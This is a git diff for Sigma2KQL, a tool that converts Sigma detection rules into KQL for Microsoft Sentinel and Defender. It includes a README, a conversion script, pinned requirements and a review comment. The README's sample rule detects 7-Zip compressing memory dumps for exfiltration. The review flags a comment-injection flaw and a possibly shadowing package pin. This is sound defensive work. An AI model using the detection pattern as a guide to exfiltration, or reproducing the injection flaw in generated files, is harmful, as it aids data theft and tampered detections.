@@ -1,68 +1,137 @@ -# Sigma2KQL -Sigma Queries turned into KQL for Defender using [pysigma-backend-microsoft365defender](https://github.com/AttackIQ/pySigma-backend-microsoft365defender/tree/main) - -Reproducible Example: -```python -!git clone https://github.com/SigmaHQ/sigma.git -!pip install pysigma-backend-microsoft365defender -import os, glob -path = 'sigma/rules/*/' -file_pattern = os.path.join(path,'*.yml') -file_list_a = glob.glob(file_pattern) - -import yaml - -def convert_to_string(yaml_dict): - # We change default style of strings to None (it's '>' in PyYAML) - # This means that PyYAML will choose style based on the data - yaml.SafeDumper.org_represent_str = yaml.SafeDumper.represent_str - def repr_str(dumper, data): - if '\n' in data: - return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|') - return dumper.org_represent_str(data) - yaml.add_representer(str, repr_str, Dumper=yaml.SafeDumper) - - yaml_str = yaml.dump(yaml_dict, default_flow_style=False, Dumper=yaml.SafeDumper) - return yaml_str - -from sigma.rule import SigmaRule -from sigma.backends.microsoft365defender import Microsoft365DefenderBackend -from sigma.pipelines.microsoft365defender import microsoft_365_defender_pipeline - - -for yml in detections_yml_paths: - with open(yml) as yaml_file: - try: - yaml_contents = load(yaml_file, Loader=SafeLoader) - # Define an example rule as a YAML str - sigma_rule = SigmaRule.from_yaml(convert_to_string(yaml_contents)) - # Create backend, which automatically adds the pipeline - m365def_backend = Microsoft365DefenderBackend() - - # Or apply the pipeline manually - pipeline = microsoft_365_defender_pipeline() - pipeline.apply(sigma_rule) - - # Convert the rule - print(sigma_rule.title + " KQL Query: \n") - kql_query = m365def_backend.convert_rule(sigma_rule)[0] - print(kql_query) - print("\n \n ") - - # Write the KQL query to a .kql file - with open('/KQL/'+sigma_rule.title.replace(' ', '_') + '.kql', 'w') as kql_file: - # Write metadata 
as comments - kql_file.write(f'// Author: {yaml_contents.get("author", "")}\n') - kql_file.write(f'// Date: {yaml_contents.get("date", "")}\n') - kql_file.write(f'// Level: {yaml_contents.get("level", "")}\n') - kql_file.write(f'// Description: {yaml_contents.get("description", "")}\n') - # Here it's assumed that 'tags' is a list - tags = yaml_contents.get("tags", []) - kql_file.write(f'// Tags: {", ".join(tags) if tags else ""}\n') - # Write the actual KQL query - kql_file.write(kql_query) - - except: - print(sigma_rule.title + " KQL Query: \n") - print('SigmaTransformationError: Rule category not yet supported by the Microsoft 365 Defender Sigma backend.') +![Update Sigma Rules](https://github.com/Khadinxc/Sigma2KQL/actions/workflows/update-sigma-rules.yml/badge.svg) +![GitHub last commit](https://img.shields.io/github/last-commit/Khadinxc/Sigma2KQL) +# Sigma2KQL - Automated Updates +Sigma Queries turned into KQL for Defender and Microsoft Sentinel using [pysigma-backend-KQL-backend](https://github.com/AttackIQ/pySigma-backend-kusto/tree/main) + +__Disclaimer: Not all of these rules have been validated either to ensure KQL is functional or if they are an exact replica of the Sigma rule. The script was created with the assumption that the pySigma Kusto backend does what it is meant to do.__ + +``` +├───KQL +│ ├───rules +│ ├───rules-compliance +│ ├───rules-emerging-threats +│ ├───rules-placeholder +│ └───rules-threat-hunting +``` + +## How do I use the helper to do this locally or in a Detection as Code pipeline? + +I've included a pip freeze of required libraries and as per standard practice for Python development I suggest creating a virtual environment not to _break_ system wide package management. 
+ +### Run the following commands to get started: + +**Clone the sigma rules repository:** + +``` +git clone https://github.com/SigmaHQ/sigma.git +``` + +``` +python -m venv .venv +``` + +**With Windows:** +``` +.\.venv\Scripts\Activate.ps1 +``` + +**With Linux** +``` +./.venv/bin/activate +``` +**Once in your Python virtual env:** + ``` +pip install -r requirements.txt +``` + +**Then you can use the script like this:** + +``` +..\.venv\Scripts\python.exe .\helper.py --sigma-dir "C:/Users/Kaiber/sigma" --output-dir "C:/Users/Kaiber/Sigma2KQL-2025/KQL" +``` + +### Sample Rule Summary: + +``` +rules-threat-hunting Summary: + Successful: 96 + Failed: 33 + Tactics covered: 13 + +================================================================================ +OVERALL CONVERSION COMPLETE! +================================================================================ +Total files processed: 3637 +Total successful conversions: 2225 +Total failed conversions: 1412 + +Output base directory: D:\Projects\SigmaTerraform\Sigma2KQL-2025\KQL + +Folder structure created: + rules/ + rules-emerging-threats/ + rules-threat-hunting/ +``` + +### Sample Rule: + +**Sigma Rule:** +``` +title: 7Zip Compressing Dump Files +id: ec570e53-4c76-45a9-804d-dc3f355ff7a7 +related: + - id: 1ac14d38-3dfc-4635-92c7-e3fd1c5f5bfc + type: derived +status: test +description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. 
+references: + - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ +author: Nasreddine Bencherchali (Nextron Systems) +date: 2022-09-27 +modified: 2023-09-12 +tags: + - attack.collection + - attack.t1560.001 +logsource: + category: process_creation + product: windows +detection: + selection_img: + - Description|contains: '7-Zip' + - Image|endswith: + - '\7z.exe' + - '\7zr.exe' + - '\7za.exe' + - OriginalFileName: + - '7z.exe' + - '7za.exe' + selection_extension: + CommandLine|contains: + - '.dmp' + - '.dump' + - '.hdmp' + condition: all of selection_* +falsepositives: + - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally + - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting +level: medium +``` + +**KQL Rule:** +``` +// Title: 7Zip Compressing Dump Files +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-09-27 +// Level: medium +// Description: Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration. +// MITRE Tactic: Collection +// Tags: attack.collection, attack.t1560.001 +// False Positives: +// - Legitimate use of 7z with a command line in which ".dmp" or ".dump" appears accidentally +// - Legitimate use of 7z to compress WER ".dmp" files for troubleshooting + +DeviceProcessEvents +| where (ProcessCommandLine contains ".dmp" or ProcessCommandLine contains ".dump" or ProcessCommandLine contains ".hdmp") and (ProcessVersionInfoFileDescription contains "7-Zip" or (FolderPath endswith "\\7z.exe" or FolderPath endswith "\\7zr.exe" or FolderPath endswith "\\7za.exe") or (ProcessVersionInfoOriginalFileName in~ ("7z.exe", "7za.exe"))) +``` + diff --git a/helper.py b/helper.py new file mode 100644 index 00000000..0c7d3fe1 --- /dev/null +++ b/helper.py 
@@ -0,0 +1,253 @@ +"""Helper script for converting sigma rules to kql for Microsoft Sentinel and Defender XDR.""" +import os +import glob +import argparse +import yaml +from yaml import load, SafeLoader +from sigma.rule import SigmaRule +from sigma.backends.kusto import KustoBackend +from sigma.pipelines.microsoftxdr import microsoft_xdr_pipeline + +# Parse command-line arguments +parser = argparse.ArgumentParser( + description='Convert Sigma rules to KQL queries for Microsoft Sentinel and Defender XDR', + formatter_class=argparse.RawDescriptionHelpFormatter, + epilog=""" +Examples: + python helper.py + python helper.py --sigma-dir ./sigma --output-dir ./output + python helper.py -s ../sigma -o ../KQL-Rules + """ +) +parser.add_argument( + '--sigma-dir', '-s', + type=str, + default='./sigma', + help='Path to the Sigma rules repository directory (default: ./sigma)' +) +parser.add_argument( + '--output-dir', '-o', + type=str, + default='./KQL', + help='Path to the output directory for KQL files (default: ./KQL)' +) + +args = parser.parse_args() + +print("Starting Script") + +# Define Sigma rule folders to process +SIGMA_BASE = os.path.abspath(args.sigma_dir) +OUTPUT_BASE = os.path.abspath(args.output_dir) + +RULE_FOLDERS = [ + "rules", + "rules-compliance", + "rules-dfir", + "rules-emerging-threats", + "rules-placeholder", + "rules-threat-hunting" +] + +print(f"Sigma base path: {SIGMA_BASE}") +print(f"Output base path: {OUTPUT_BASE}") +print(f"Rule folders to process: {', '.join(RULE_FOLDERS)}") +print("="*80) + +def convert_to_string(yaml_dict): + """Function converts yaml dict to string.""" + # We change default style of strings to None (it's '>' in PyYAML) + # This means that PyYAML will choose style based on the data + yaml.SafeDumper.org_represent_str = yaml.SafeDumper.represent_str + def repr_str(dumper, data): + if '\n' in data: + return dumper.represent_scalar('tag:yaml.org,2002:str', data, style='|') + return dumper.org_represent_str(data) + 
yaml.add_representer(str, repr_str, Dumper=yaml.SafeDumper) + + yaml_str = yaml.dump(yaml_dict, default_flow_style=False, Dumper=yaml.SafeDumper) + return yaml_str + + +def extract_mitre_tactic(tags): + """Extract MITRE ATT&CK tactic from tags.""" + # MITRE tactics mapping - using hyphens as that's what Sigma uses + tactics = { + 'attack.reconnaissance': 'Reconnaissance', + 'attack.resource-development': 'Resource Development', + 'attack.resource_development': 'Resource Development', + 'attack.initial-access': 'Initial Access', + 'attack.initial_access': 'Initial Access', + 'attack.execution': 'Execution', + 'attack.persistence': 'Persistence', + 'attack.privilege-escalation': 'Privilege Escalation', + 'attack.privilege_escalation': 'Privilege Escalation', + 'attack.defense-evasion': 'Defense Evasion', + 'attack.defense_evasion': 'Defense Evasion', + 'attack.credential-access': 'Credential Access', + 'attack.credential_access': 'Credential Access', + 'attack.discovery': 'Discovery', + 'attack.lateral-movement': 'Lateral Movement', + 'attack.lateral_movement': 'Lateral Movement', + 'attack.collection': 'Collection', + 'attack.command-and-control': 'Command and Control', + 'attack.command_and_control': 'Command and Control', + 'attack.exfiltration': 'Exfiltration', + 'attack.impact': 'Impact' + } + + if not tags: + return 'Uncategorized' + + # Find the first matching tactic + for tag in tags: + tag_lower = tag.lower() + for tactic_key, tactic_name in tactics.items(): + if tag_lower.startswith(tactic_key): + return tactic_name + + return 'Uncategorized' + + +# Overall Statistics +TOTAL_SUCCESSFUL = 0 +TOTAL_FAILED = 0 +overall_stats = {} + +# Process each rule folder +for rule_folder in RULE_FOLDERS: + print(f"\nProcessing: {rule_folder}") + print("-"*80) + + # Get all YAML files from this rule folder + PATH = os.path.join(SIGMA_BASE, rule_folder) + file_pattern = os.path.join(PATH, '**', '*.yml') + file_list = glob.glob(file_pattern, recursive=True) + + print(f"Found 
{len(file_list)} Sigma rule files in {rule_folder}") + + if not file_list: + print(f"No files found in {rule_folder}, skipping...") + continue + + # Statistics for this folder + SUCCESSFUL_CONVERSIONS = 0 + FAILED_CONVERSIONS = 0 + tactic_stats = {} + + for idx, yml in enumerate(file_list, 1): + try: + with open(yml, encoding='utf-8') as yaml_file: + yaml_contents = load(yaml_file, Loader=SafeLoader) + + # Define an example rule as a YAML str + sigma_rule = SigmaRule.from_yaml(convert_to_string(yaml_contents)) + + # Create backend with the pipeline + pipeline = microsoft_xdr_pipeline() + backend = KustoBackend(processing_pipeline=pipeline) + + # Convert the rule + kql_query = backend.convert_rule(sigma_rule)[0] + + # Get MITRE tactic from tags + tags = yaml_contents.get("tags", []) + TACTIC_FOLDER = extract_mitre_tactic(tags) + + # Preserve original sigma repository folder structure for outputs + # Compute the path of the YAML file relative to the sigma base + rel_path = os.path.relpath(yml, SIGMA_BASE) + rel_dir = os.path.dirname(rel_path) + # If the file was at the top-level of SIGMA_BASE, fall back to rule_folder + if rel_dir: + OUTPUT_DIR = os.path.join(OUTPUT_BASE, rel_dir) + else: + OUTPUT_DIR = os.path.join(OUTPUT_BASE, rule_folder) + os.makedirs(OUTPUT_DIR, exist_ok=True) + + # Sanitize filename and convert to snake_case + SAFE_FILENAME = "".join(c if c.isalnum() or c in (' ', '_', '-') else '_' for c in sigma_rule.title) + # Convert to lowercase snake_case + SNAKE_CASE_FILENAME = SAFE_FILENAME.replace(' ', '_').replace('-', '_').lower() + # Remove multiple consecutive underscores + while '__' in SNAKE_CASE_FILENAME: + SNAKE_CASE_FILENAME = SNAKE_CASE_FILENAME.replace('__', '_') + output_file = os.path.join(OUTPUT_DIR, SNAKE_CASE_FILENAME + '.kql') + + with open(output_file, 'w', encoding='utf-8') as kql_file: + # Write metadata as comments + kql_file.write(f'// Title: {sigma_rule.title}\n') + kql_file.write(f'// Author: {yaml_contents.get("author", 
"")}\n') + kql_file.write(f'// Date: {yaml_contents.get("date", "")}\n') + kql_file.write(f'// Level: {yaml_contents.get("level", "")}\n') + + # Handle multi-line descriptions + description = yaml_contents.get("description", "") + if description: + # Split by newlines and comment each line + desc_lines = description.split('\n') + kql_file.write(f'// Description: {desc_lines[0]}\n') + for line in desc_lines[1:]: + if line.strip(): # Only write non-empty lines + kql_file.write(f'// {line}\n') + + kql_file.write(f'// MITRE Tactic: {TACTIC_FOLDER}\n') + kql_file.write(f'// Tags: {", ".join(tags) if tags else ""}\n') + + # Write false positives if present + false_positives = yaml_contents.get("falsepositives", []) + if false_positives: + # Filter out empty or "unknown" entries + valid_fps = [str(fp).strip() for fp in false_positives + if fp and str(fp).strip() and str(fp).strip().lower() != 'unknown'] + if valid_fps: + kql_file.write('// False Positives:\n') + for fp_str in valid_fps: + kql_file.write(f'// - {fp_str}\n') + + kql_file.write('\n') + # Write the actual KQL query + kql_file.write(kql_query) + + SUCCESSFUL_CONVERSIONS += 1 + # Track by tactic + tactic_stats[TACTIC_FOLDER] = tactic_stats.get(TACTIC_FOLDER, 0) + 1 + + if SUCCESSFUL_CONVERSIONS % 10 == 0: + print(f"[{idx}/{len(file_list)}] {rule_folder}: Converted: {SUCCESSFUL_CONVERSIONS}") + print(f"Failed: {FAILED_CONVERSIONS}") + + except Exception as e: + FAILED_CONVERSIONS += 1 + rule_name = yaml_contents.get('title', os.path.basename(yml)) if 'yaml_contents' in locals() else os.path.basename(yml) + if FAILED_CONVERSIONS <= 5: # Only show first 5 errors in detail + print(f"[{idx}/{len(file_list)}] {rule_name} - Error: {str(e)[:100]}") + # Continue to next file # Print statistics for this folder + print(f"\n{rule_folder} Summary:") + print(f" Successful: {SUCCESSFUL_CONVERSIONS}") + print(f" Failed: {FAILED_CONVERSIONS}") + if tactic_stats: + print(f" Tactics covered: {len(tactic_stats)}") + + # Update 
overall statistics + TOTAL_SUCCESSFUL += SUCCESSFUL_CONVERSIONS + TOTAL_FAILED += FAILED_CONVERSIONS + + # Merge tactic stats + for tactic, count in tactic_stats.items(): + folder_key = f"{rule_folder}/{tactic}" + overall_stats[folder_key] = count + +# Print final statistics +print("\n" + "="*80) +print("OVERALL CONVERSION COMPLETE!") +print("="*80) +print(f"Total files processed: {TOTAL_SUCCESSFUL + TOTAL_FAILED}") +print(f"Total successful conversions: {TOTAL_SUCCESSFUL}") +print(f"Total failed conversions: {TOTAL_FAILED}") +print(f"\nOutput base directory: {OUTPUT_BASE}") +print("\nFolder structure created:") +for rule_folder in RULE_FOLDERS: + folder_path = os.path.join(OUTPUT_BASE, rule_folder) + if os.path.exists(folder_path): + print(f" {rule_folder}/") diff --git a/requirements.txt b/requirements.txt new file mode 100644 index 00000000..d28a44be --- /dev/null +++ b/requirements.txt @@ -0,0 +1,15 @@ +certifi==2025.11.12 +charset-normalizer==3.4.4 +idna==3.11 +Jinja2==3.1.6 +MarkupSafe==3.0.3 +packaging==24.2 +pyaml==25.7.0 +pyparsing==3.2.5 +pySigma==0.11.23 +pySigma-backend-kusto==0.4.4 +pySigma-backend-microsoft365defender==0.3.2 +PyYAML==6.0.3 +requests==2.32.5 +sigma==0.0.1 +urllib3==2.5.0 diff --git a/sigma b/sigma new file mode 160000 index 00000000..d5188c36 --- /dev/null +++ b/sigma @@ -0,0 +1 @@ +Subproject commit d5188c36a1c19eb101194a9c263a8e3ce285aa1e
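Review bot: The metadata comment block at the top of each generated `.kql` file can be escaped by any multi-line value: `author`, `date`, `level`, the joined `tags` and each `fp_str` are written with a single `// ` prefix, so a line break inside one of them lands unprefixed in the query body (only `description` is split per line), and since the Sigma tree is pulled from a third-party repository and the output is committed by the workflow, such text would ship as query code rather than as a comment. Route every field through one helper that splits on line breaks and prefixes each piece, as sketched below. Two smaller points in the same hunk: the `except Exception` branch reports `rule_name` from the previous iteration's `yaml_contents` when `load()` itself fails (the script runs at module level, so the old binding survives in `locals()`), which `yaml_contents = None` at the top of the `try` plus `isinstance(yaml_contents, dict)` in the handler would fix; and the output filename is derived from `title` alone, so two rules with the same title silently overwrite each other — appending the rule's `id` (`yaml_contents.get("id")`) would keep them distinct. Separately, `requirements.txt` pins `sigma==0.0.1` alongside `pySigma`; the `sigma.rule` and `sigma.backends.kusto` imports here come from pySigma, so a separate distribution owning the `sigma` top-level name looks like an unrelated package that could shadow those modules — worth confirming that pin is intentional.
```python
def _comment_lines(label, value):
    """Yield '// ' comment lines for value; line breaks inside it stay inside the comment block."""
    text = "" if value is None else str(value)
    first, *rest = text.splitlines() or [""]
    yield f"// {label}{first}\n"
    for line in rest:
        if line.strip():
            yield f"// {line}\n"

# … unchanged: argument parsing, rule discovery, conversion, output path …
with open(output_file, 'w', encoding='utf-8') as kql_file:
    kql_file.writelines(_comment_lines("Title: ", sigma_rule.title))
    kql_file.writelines(_comment_lines("Author: ", yaml_contents.get("author", "")))
    kql_file.writelines(_comment_lines("Date: ", yaml_contents.get("date", "")))
    kql_file.writelines(_comment_lines("Level: ", yaml_contents.get("level", "")))
    kql_file.writelines(_comment_lines("Description: ", yaml_contents.get("description", "")))
    kql_file.writelines(_comment_lines("MITRE Tactic: ", TACTIC_FOLDER))
    kql_file.writelines(_comment_lines("Tags: ", ", ".join(map(str, tags)) if tags else ""))
    # … unchanged: false-positive filtering into valid_fps …
    for fp_str in valid_fps:
        kql_file.writelines(_comment_lines("- ", fp_str))
    kql_file.write('\n')
    kql_file.write(kql_query)
```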